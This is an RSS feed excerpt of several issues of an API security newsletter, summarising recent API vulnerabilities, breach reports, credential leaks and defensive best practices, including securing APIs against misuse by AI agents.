<p style="font-weight: 400;"><span style="font-weight: 400;">Continuing on the topic of malicious user input, Radware&#8217;s Web Application Firewall (WAF) was found to be vulnerable to malformed input, either in the form of malicious payloads in GET requests, or by adding non-alphanumeric characters to bypass the WAF’s signature-based detection rules.  </span></p>
<p style="font-weight: 400; text-align: center;"><strong>“Notably, these flaws persist despite modern WAFs employing machine learning models for anomaly detection.”</strong></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This type of attack is commonly used by threat actors to automatically fuzz a web application or API with malformed input to detect any unexpected response from the target. An expected or undefined API response often reveals a vulnerability, such as a logic flaw or security misconfiguration, that can be further exploited. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">WAFs are useful in the web application space. However, APIs have an inherently larger attack surface than traditional web applications due to the numerous endpoints, data properties and parameters they expose. This can create blind spots for WAFs that weren’t designed for fine-grained API security. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://gbhackers.com/radware-cloud-web-app-firewall-flaw/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> recommends implementing secondary input validation layers capable of blocking logically inconsistent traffic. In the API domain, a purpose-built schema or API contract validator can help to protect against these types of malicious input attacks.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Cisco Platform API exposes privilege escalation flaw </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, this week, further highlighting the importance of input validation for API security, a recent </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-priv-esc-3Pk96SU4" target="_blank" rel="noopener"><span style="font-weight: 400;">security advisory</span></a><span style="font-weight: 400;"> reports several vulnerabilities discovered in the Cisco Unified Intelligence Center platform, all due to “insufficient validation of user-supplied parameters in API requests”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">All APIs require customized security because each has its own data properties and access control requirements. Most attacks against APIs are exploited via the API transaction, in the form of malicious request data or unenforced security controls, such as missing authentication or insufficient resource authorization (e.g. “this user is authorized to access this requested object”).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">To be effective, API input validation must be fine-grained and enforce a data allowlist and security requirements tailored to the service provided by the API. This ensures that the API is designed to accept only valid requests and reject malicious or invalid requests by default.</span></p>
<p>The post <a href="https://apisecurity.io/issue-272-volkswagen-api-hacked-api-flaws-in-instagram-tiktok-eli-attacks-radware-cisco-api-vulnerabilities/">Issue 272: Volkswagen API hacked, API flaws in Instagram &#038; Tiktok, ELi attacks, Radware &#038; Cisco API vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 271: API breaches surge in APAC, ‘Raw’ dating app exposes users, API credential missteps &#038; API sprawl</title>
		<link>https://apisecurity.io/issue-271-api-breaches-surge-in-apac-raw-dating-app-exposes-users-api-credential-missteps-api-sprawl/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 08 May 2025 14:04:04 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[APi governance]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[Critical API security flaw]]></category>
		<category><![CDATA[LLM]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11317</guid>

					<description><![CDATA[<p>This week, we look at a sharp rise in API security incidents across Asia-Pacific, and a critical API vulnerability in the dating app Raw. We also explore two credential-related incidents: one involving leaked OAuth credentials, and another highlighting the risks from long-lived API keys. Finally, a deep dive into the growing problem of API sprawl [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-271-api-breaches-surge-in-apac-raw-dating-app-exposes-users-api-credential-missteps-api-sprawl/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-271-api-breaches-surge-in-apac-raw-dating-app-exposes-users-api-credential-missteps-api-sprawl/">Issue 271: API breaches surge in APAC, ‘Raw’ dating app exposes users, API credential missteps &#038; API sprawl</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we look at a sharp rise in API security incidents across Asia-Pacific, and a critical API vulnerability in the dating app </span><i><span style="font-weight: 400;">Raw</span></i><span style="font-weight: 400;">. We also explore two credential-related incidents: one involving leaked OAuth credentials, and another highlighting the risks from long-lived API keys. Finally, a deep dive into the growing problem of API sprawl and the need for effective API governance to manage the numbers of APIs under development.</span></p>
<h2><span style="font-weight: 400;">Industry Report: High numbers of API security incidents in APAC </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A new survey </span><a href="https://cybersecasia.net/pr-newswire/new-akamai-study-reveals-api-security-incidents-cost-apac-enterprises-over-us580000-on-average-in-the-past-year/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> on the costs of API attacks in the Asia-Pacific region revealed an average cost of US$580,000 per incident over the past year. Australia reported the highest frequency of incidents, with 96% of organizations affected, while China estimated the highest average cost at US$780,000.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report also mentions that many causes of these API incidents could be identified by developers before the APIs are released. However, the report goes on to place more emphasis on production testing than developer testing, which I find odd because in production, vulnerabilities are already exposed, and the complexity of diagnosing and resolving issues related to production traffic is much higher for developers. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The survey results indicate the top four likely causes of API security incidents as:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">API misconfigurations (22.3%)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The network firewall didn’t catch it (20.8%)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">API gateway didn’t catch it (20.7%)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Authorization vulnerabilities (20.6%)</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">API misconfiguration is a relatively broad category of API vulnerability. For example, among the various ways an API can be vulnerable to security misconfiguration, </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa8-security-misconfiguration/#is-the-api-vulnerable" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP</span></a><span style="font-weight: 400;"> casts a wide net:</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">“Appropriate security hardening is missing across any part of the API stack”.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So, an API misconfiguration vulnerability (OWASP API8:2023) could be considered the root cause of other vulnerabilities, such as broken authentication (OWASP API2:2023), broken authorization (OWASP API1:2023), or excessive data exposure (OWASP API3:2023), depending on whether the vulnerability is categorized by root cause or impact. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It&#8217;s an interesting </span><a href="https://www.akamai.com/lp/report/api-security-study-asia-pacific-2025" target="_blank" rel="noopener"><span style="font-weight: 400;">survey</span></a><span style="font-weight: 400;">, though perhaps lacks clarity on some key points. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Critical API security flaw in dating app ‘Raw’</span></h2>
<p style="font-weight: 400;"><a href="https://techcrunch.com/2025/05/02/dating-app-raw-exposed-users-location-data-personal-information/" target="_blank" rel="noopener"><i><span style="font-weight: 400;">TechCrunch</span></i></a><span style="font-weight: 400;"> researchers have revealed a security vulnerability in the dating app </span><i><span style="font-weight: 400;">Raw</span></i><span style="font-weight: 400;">, exposing users’ personal information and real-time location data. The flaw, an Insecure Direct Object Reference (IDOR), allowed unauthorized access to sensitive user details such as display names, birth dates, sexual preferences, and GPS coordinates accurate down to the street level.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We previously reported a similar issue in </span><i><span style="font-weight: 400;">FeelD</span></i><span style="font-weight: 400;">, another dating app, in </span><a href="https://apisecurity.io/issue-255-versa-director-api-flaw-feeld-bola-vulnerabilities-logic-flaw-risks-aircraft-disaster/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue 255</span></a><span style="font-weight: 400;"> of </span><i><span style="font-weight: 400;">APISecurity.io</span></i><span style="font-weight: 400;">. These kinds of vulnerabilities are especially prevalent in applications designed for social networking, collaboration, or resource sharing, where APIs provide essential functionality to search for other members or for shared resources. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These APIs must be carefully designed to enforce proper authorization and ensure that the data returned is filtered based on the requester’s permissions and context. For example, an API that fetches the current users own profile data will be different to an API that fetches other users profile data. Attempting to mix the two can further complicate the access control mechanism. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Testing for authorization flaws in these scenarios is often complex. It typically requires simulating multiple user roles and permissions to fully assess authorization controls. However, this level of testing is essential for avoiding the top security risk in the OWASP API Security Top 10: </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">Broken Object Level Authorization</span></a><span style="font-weight: 400;"> (BOLA).</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Unauthenticated API leaks OAuth credentials</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A security researcher </span><a href="https://blog.rmsec.io/posts/leveraging_oauth_misconfiguration_a_practical_bug_bounty_exploitation/" target="_blank" rel="noopener"><span style="font-weight: 400;">reported</span></a><span style="font-weight: 400;"> finding an API leaking OAuth2 credentials in plaintext. These credentials were part of a Client Credentials Grant flow, which is typically used for secure server-to-server communication. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">OAuth is widely recommended as a secure framework for API authorization. But not all OAuth flows offer the same level of security, and poor implementation can introduce vulnerabilities, such as credential leakage or authorization bypasses. In this case, the client credentials should remain strictly confidential, but were strangely returned in the response from an unauthenticated API. This may have been implemented intentionally by the developer for the sake of convenience.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The vulnerability was uncovered by inspecting network traffic from a web application. Unfortunately, it’s a common misconception among developers that APIs embedded in trusted applications are inherently secure or hidden from attackers. As the researcher’s detailed walkthrough shows, insecure web APIs are not only visible but also easily exploitable.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: xAI LLMs exposed to long term abuse </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Continuing on the topic of API credential vulnerabilities, a recent </span><i><span style="font-weight: 400;">KrebsOnSecurity</span></i> <a href="https://krebsonsecurity.com/2025/05/xai-dev-leaks-api-key-for-private-spacex-tesla-llms" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> reveals that a developer at Elon Musk’s xAI inadvertently exposed a private API key on GitHub. This key granted access to at least 60 private large language models (LLMs), including experimental and unreleased versions.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some of these models were reportedly trained on proprietary data from SpaceX and Tesla, potentially exposing sensitive corporate information to anyone who came across the leaked key.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While the most critical failure was the exposure of the API key in a public repository, from an API security perspective, however, the situation was made significantly worse by the fact that the key remained active for two months after the issue was first reported. This demonstrates the risk of using long-lived API keys that lack an automatic expiration.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The recommended best practice is to use short-lived access tokens in place of static API keys. In the event of accidental exposure, these tokens limit the window of opportunity for attackers, helping to reduce the potential impact and the organization’s risk.</span></p>
<h2><span style="font-weight: 400;">Article: API Sprawl and the case for governance</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">To wrap up this week, here’s an interesting </span><a href="https://thenewstack.io/api-sprawl-is-a-culture-problem-not-just-a-tech-one/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> that explores the growing problem of API sprawl, where for example APIs are created and deployed without collaboration or oversight from security and operations teams.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As the author notes, API sprawl isn’t simply a matter of having too many APIs. The real issue lies in the way APIs are developed in silos, often without clear rules or shared standards. This leads to overlapping functionality, inconsistent documentation, and increased security vulnerabilities.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">At the core of the problem is a lack of governance. Setting clear guidelines for how APIs are designed, shared, secured, and eventually retired, is the key. It means making sure that everyone is on the same page from the start and that there&#8217;s a process for keeping APIs consistent and manageable across the organization.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I noted one Ponemon </span><a href="https://ponemonsullivanreport.com/2023/09/state-of-api-security-2023-global-findings" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> estimating that the average organization manages around 1,000 APIs, though in reality, I suspect the number is likely orders of magnitude higher for many organizations. A quick look through internal code repositories often reveals old API specifications, which can provide hints about the number of unmanaged APIs, as well as what an API does or what kind of security (if any) was added. These artefacts can serve as a useful view into past development practices, especially before any formal governance was put in place.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Meanwhile, without governance, APIs will continue to pile up fast and become hard to track or secure!</span></p>
<p>The post <a href="https://apisecurity.io/issue-271-api-breaches-surge-in-apac-raw-dating-app-exposes-users-api-credential-missteps-api-sprawl/">Issue 271: API breaches surge in APAC, ‘Raw’ dating app exposes users, API credential missteps &#038; API sprawl</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 270: AI double agents, securing API access, OpenAPI-driven MCP, APIs expose 33,000 employees</title>
		<link>https://apisecurity.io/issue-270-ai-double-agents-securing-api-access-openapi-driven-mcp-apis-expose-33000-employees/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 24 Apr 2025 17:47:55 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[GenAI]]></category>
		<category><![CDATA[LLM integration]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11313</guid>

					<description><![CDATA[<p>This week, the theme is AI, with articles on securing APIs against agentic misuse and preventing unintended behaviors. We cover two critical vulnerabilities in AI platforms Langflow and Dify, both caused by API security flaws, and highlight a major data leak due to unauthenticated internal APIs. Finally, we look at an engaging conversation around using [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-270-ai-double-agents-securing-api-access-openapi-driven-mcp-apis-expose-33000-employees/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-270-ai-double-agents-securing-api-access-openapi-driven-mcp-apis-expose-33000-employees/">Issue 270: AI double agents, securing API access, OpenAPI-driven MCP, APIs expose 33,000 employees</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, the theme is AI, with articles on securing APIs against agentic misuse and preventing unintended behaviors. We cover two critical vulnerabilities in AI platforms Langflow and Dify, both caused by API security flaws, and highlight a major data leak due to unauthenticated internal APIs. Finally, we look at an engaging conversation around using OpenAPI to auto-generate MCP servers. </span></p>
<h2><span style="font-weight: 400;">Article: AI Agents prompted to attack APIs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">First up this week, an article by Facundo Fernandez on </span><a href="https://fdzdev.medium.com/security-vulnerabilities-in-autonomous-ai-agents-26f905b2dc36" target="_blank" rel="noopener"><span style="font-weight: 400;">security vulnerabilities in autonomous AI agents </span></a><span style="font-weight: 400;">highlights a growing concern for securing APIs from AI agents. The article provides examples of how an AI agent might be abused to launch common API authorization attacks, such as BOLA and BFLA from the OWASP Top 10 API security vulnerabilities list. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Autonomous agents aren’t inherently malicious, but they don’t need to be. If you hand one an API token and let it loose with vague instructions, it might just exfiltrate data or perform sensitive actions purely by following what it thinks is a logical flow. The attacker doesn’t need to penetrate and exploit your APIs directly, they just need to socially engineer an AI agent.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">At the end of the day, APIs are still gatekeepers to critical services and sensitive user data, and must ensure adequate and effective security on behalf of the user. So strong authentication and authorization will remain critically important API security controls. The bigger, or at least newer, challenge today seems to be fine-grained control over what agents are allowed to do via APIs, plus runtime validation that any API request from an AI agent aligns with expected behavior. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The takeaway: if autonomous agents are becoming first-class API clients, they need to be governed as such. Trust, but verify. And preferably, constrain.</span></p>
<h2><span style="font-weight: 400;">Article: Securing APIs for agentic access</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">As a counter to the security concerns raised in the previous article, Kristopher Sandoval of NordicAPIs recently shared his take on “</span><a href="https://nordicapis.com/5-ways-to-secure-agentic-access-to-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">5 Ways to Secure Agentic Access to APIs</span></a><span style="font-weight: 400;">”.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Unsurprisingly, securing APIs against the relatively unpredictable behavior of AI agents calls for some advanced and, at times, novel solutions.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Among the recommendations, using an identity framework like SPIFFE to authorize API consumption, layering behavior-based access controls on top of attribute-based ones, and developing your own internal agents to intercept and manage API calls. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">But even for sophisticated clients, core API security policies and governance rules still need to be enforced by the API. If the baseline API security is lacking to begin with, any client, human or agent, can find and exploit API those gaps.   </span></p>
<h2><span style="font-weight: 400;">Vulnerability: API flaw exposes agentic AI workflow tool</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">An API vulnerability was recently discovered in Langflow, a popular open-source tool for building agentic AI workflows. The flaw centers on an unauthenticated API that executes untrusted user input using Python’s ‘exec’ function. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researchers at Horizon3.ai </span><a href="https://horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/" target="_blank" rel="noopener"><span style="font-weight: 400;">published</span></a><span style="font-weight: 400;"> their findings after an exploit for the vulnerability was already made public. The issue allows an unauthenticated user to remotely execute malicious code on Langflow servers, effectively granting full control over the AI tool.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This incident highlights the importance of testing the exposed functionality of API endpoints that do not require authentication. Vulnerabilities can arise from two common errors: failing to enforce authentication when it should be required, or deliberately disabling authentication for an endpoint but unintentionally exposing sensitive data or privileged operations.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Open source tools like Langflow provide amazing value and the benefits of development velocity. But by adopting open-source tools and libraries, software teams inherit the burden of validating and securing that dependency. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: LLM platform API undermines client-side security</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://github.com/langgenius/dify/security/advisories/GHSA-hqcx-598m-pjq4" target="_blank" rel="noopener"><span style="font-weight: 400;">security advisory</span></a><span style="font-weight: 400;"> highlights an API authorization vulnerability in Dify, an open-source LLM app development platform. This vulnerability allows non-admin users to enable or disable applications via the API, despite the web UI restricting this functionality to administrators. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The issue lies in the API&#8217;s failure to enforce proper authorization checks. While the UI correctly disables certain actions for non-admin users, the backend API does not validate the user&#8217;s role before processing requests to change application states. This discrepancy enables attackers to bypass frontend restrictions by directly interacting with the API.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs should never assume the frontend has handled authorization. Every API request must be authenticated and authorized independently to prevent unauthorized access or actions. Relying on the UI for security checks is insufficient, as APIs can be accessed through various tools or scripts, bypassing any client-side restrictions.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Unprotected APIs expose 33,000 employees</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In another recent </span><a href="https://securityonline.info/unprotected-apis-expose-data-of-33000-employees/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;">, unprotected APIs embedded in an internal web application were found exposing sensitive data of over 33,000 employees. These APIs returned names, contact details, device information, and internal project credentials, all without requiring authentication.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This incident is similar to the previous vulnerability discussed about the Dify platform: APIs servicing internal apps, whether web or mobile, are often deployed without proper security controls. In both cases, the problem wasn’t how users interacted with the application, but rather the lack of protection at the API layer.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Assuming APIs are internal or only accessible through a UI is a common mistake in API development. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As more functionality shifts to microservices and APIs, every endpoint becomes a potential entry point. If it handles sensitive data or critical actions, it must be authenticated and authorized, no exceptions.</span></p>
<h2><span style="font-weight: 400;">Discussion: Kickstarting an MCP server with OpenAPI</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">42Crunch founder and CTO Philippe Leothaud’s recent </span><a href="https://www.linkedin.com/posts/philippe-leothaud_if-your-api-has-been-designed-carefully-as-activity-7316436576371195904-NxU0" target="_blank" rel="noopener"><span style="font-weight: 400;">LinkedIn post</span></a><span style="font-weight: 400;"> has sparked an engaging discussion on the evolution of API design and its impact on automation and interoperability. Philippe suggests that well-crafted APIs, complete with a comprehensive OpenAPI Specification (OAS), can pave the way for automatically generating Model-Context-Protocol (MCP) servers. This approach could significantly streamline the development process, reducing manual coding and enhancing consistency across services.​</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Several industry experts joined the conversation. </span><b>Frank Kilcommins</b><span style="font-weight: 400;">, Principal API Technical Evangelist at SmartBear, highlighted ongoing efforts to integrate MCP support into Swagger Codegen, referencing an open feature request on </span><a href="https://github.com/swagger-api/swagger-codegen/issues/12536" target="_blank" rel="noopener"><span style="font-weight: 400;">GitHub</span></a><span style="font-weight: 400;">. </span><b>Mark O Neill</b><span style="font-weight: 400;">, VP Distinguished Analyst and Chief of Researcher at Gartner, pointed to potential challenges with using Arazzo in this context, specifically how to manage authorization across multiple APIs under a single MCP server. </span><b>Erik Wilde</b><span style="font-weight: 400;"> from INNOQ also cautioned that automation doesn&#8217;t always produce optimal results, like generating OpenAPI specs from existing code.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Tools like Swagger Codegen already auto-generate SDKs and documentation from a well-crafted OpenAPI file, but the key to high-quality output lies in how precise and complete that description is. The richer the OpenAPI file, the more value you get from automation tools.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A timely and insightful discussion, well worth a read.</span></p>
<p>The post <a href="https://apisecurity.io/issue-270-ai-double-agents-securing-api-access-openapi-driven-mcp-apis-expose-33000-employees/">Issue 270: AI double agents, securing API access, OpenAPI-driven MCP, APIs expose 33,000 employees</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 269: API Security Guidelines, Mastering OpenAPI, Security Flaws in Shopware and Zabbix APIs</title>
		<link>https://apisecurity.io/issue-269-api-security-guidelines-mastering-openapi-security-flaws-in-shopware-and-zabbix-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 10 Apr 2025 16:53:51 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11306</guid>

					<description><![CDATA[<p>This week, the UK’s NCSC released detailed API security guidelines. Lorna Mitchell offers practical strategies for managing large OpenAPI files. Pieter Danhieux advocates for developer-focused security training in Australia. We also share best practices to secure your Postman collections and cover recent API vulnerability incidents at Zabbix and Shopware. Article: UKs NCSC promotes secure API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-269-api-security-guidelines-mastering-openapi-security-flaws-in-shopware-and-zabbix-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-269-api-security-guidelines-mastering-openapi-security-flaws-in-shopware-and-zabbix-apis/">Issue 269: API Security Guidelines, Mastering OpenAPI, Security Flaws in Shopware and Zabbix APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, the UK’s NCSC released detailed API security guidelines. Lorna Mitchell offers practical strategies for managing large OpenAPI files. Pieter Danhieux advocates for developer-focused security training in Australia. We also share best practices to secure your Postman collections and cover recent API vulnerability incidents at Zabbix and Shopware.</span></p>
<h2><span style="font-weight: 400;">Article: UKs NCSC promotes secure API development</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The UK&#8217;s National Cyber Security Centre (NCSC) has published a detailed set of </span><a href="https://www.ncsc.gov.uk/collection/securing-http-based-apis/1-secure-development-practices" target="_blank" rel="noopener"><span style="font-weight: 400;">guidelines</span></a><span style="font-weight: 400;"> for the secure development of HTTP-based APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The guidance covers key areas including API design and threat modeling, documentation and asset management, and also secure development and testing practices.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A key recommendation is the use of standardized API specifications, notably OpenAPI, to fully document and describe APIs. OpenAPI enables clear and consistent documentation about the security controls required for an API, making it easier to test and verify whether those controls are implemented effectively. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The NCSC also emphasizes effective API version management to prevent the use of deprecated or insecure versions, helping to maintain a strong API security posture.</span></p>
<h2><span style="font-weight: 400;">Article: Expert tips for mastering OpenAPI design</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In “</span><a href="https://thenewstack.io/openapi-how-to-handle-file-management/" target="_blank" rel="noopener"><span style="font-weight: 400;">OpenAPI: How to Handle File Management</span></a><span style="font-weight: 400;">”, Lorna Mitchell shares practical tips for managing OpenAPI files as APIs grow in size and complexity. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">She highlights the value of a design-first approach and recommends using </span><span style="font-weight: 400;">$ref</span><span style="font-weight: 400;"> syntax to reduce duplication and increase consistency. The article covers different ways to structure OpenAPI files, from the basics of shared components to more granular structures with one file per schema or operation. While each approach has trade-offs, the key takeaway is to find the right balance for your team’s workflow.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Increasingly, OpenAPI files play a central role in the API lifecycle. They power automated API testing, define runtime security requirements, and provide clear documentation for consumers.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">That’s why having a solid process, and the right editor tool, to manage and navigate OpenAPI files is crucial for effective API governance.</span></p>
<h2><span style="font-weight: 400;">Article: Championing Security-Aware Developers in Australia</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a recent </span><a href="https://www.cyberdaily.au/security/11914-op-ed-paving-a-pathway-to-better-australian-cyber-security-preparedness" target="_blank" rel="noopener"><span style="font-weight: 400;">CyberDaily.au</span></a><span style="font-weight: 400;"> op-ed, &#8220;Paving a pathway to better Australian cyber security preparedness,&#8221; Pieter Danhieux highlights the need to prioritize security awareness across all roles, especially developers. Since developers can eliminate vulnerabilities before code reaches production, investing in their security training offers an effective first line of defense.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This aligns with the principle of developer-first security in API development, which embeds security early in the process. By integrating tools and practices into developer workflows, organizations can build secure APIs from the ground up, making them more resilient to being exploited from common attacks such as the OWASP Top 10 list of API vulnerabilities. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Not incidentally, security expertise will remain crucial as code generation is offloaded to AI and the latest trends of vibe programming. LLMs are prone to vulnerabilities like </span><a href="https://www.securecodewarrior.com/article/prompt-injection-and-the-security-risks-of-agentic-coding-tools" target="_blank" rel="noopener"><span style="font-weight: 400;">prompt injection</span></a><span style="font-weight: 400;">, so AI-generated code will still need to be reviewed by knowledgeable developers who can spot and correct vulnerabilities. </span></p>
<h2><span style="font-weight: 400;">Article: Steps to prevent data leaks from Postman collections </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A timely </span><a href="https://dzone.com/articles/stop-exposing-secrets-secure-your-apis-in-postman" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> on DZone emphasizes the importance of protecting sensitive information when using Postman for API development. It offers practical steps to prevent accidental exposure of credentials, API keys, and tokens. Some key recommendations include:​</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Running Postman&#8217;s Secret Scanner</b><span style="font-weight: 400;"> to detect and alert users to exposed secrets within their Postman workspaces.​</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Storing sensitive data in environment variables</b><span style="font-weight: 400;"> instead of hardcoding them into requests.​</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Using short-lived tokens</b><span style="font-weight: 400;"> and rotating them regularly to minimize the risk of unauthorized access.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">These steps are particularly important in light of the CloudSEK report covered in an earlier </span><a href="https://apisecurity.io/issue-262-api-incidents-in-invoice-ninja-mcdonalds-truecaller-apps-jetbrains-survey-postman-data-leaks/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue</span></a><span style="font-weight: 400;"> of this newsletter, which uncovered over 30,000 publicly accessible Postman workspaces leaking sensitive data such as API keys, credentials, and tokens. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Adopting the best practices outlined in the DZone article can help to mitigate these risks in your API development and testing environments. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Zabbix API exposes OWASP security flaws</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Zabbix, a widely used IT infrastructure monitoring platform, </span><a href="https://securityonline.info/multiple-vulnerabilities-in-zabbix-open-the-door-to-xss-dos-and-sql-injection/" target="_blank" rel="noopener"><span style="font-weight: 400;">recently patched</span></a><span style="font-weight: 400;"> several API security vulnerabilities, including SQL injection, user enumeration, and excessive data exposure.</span></p>
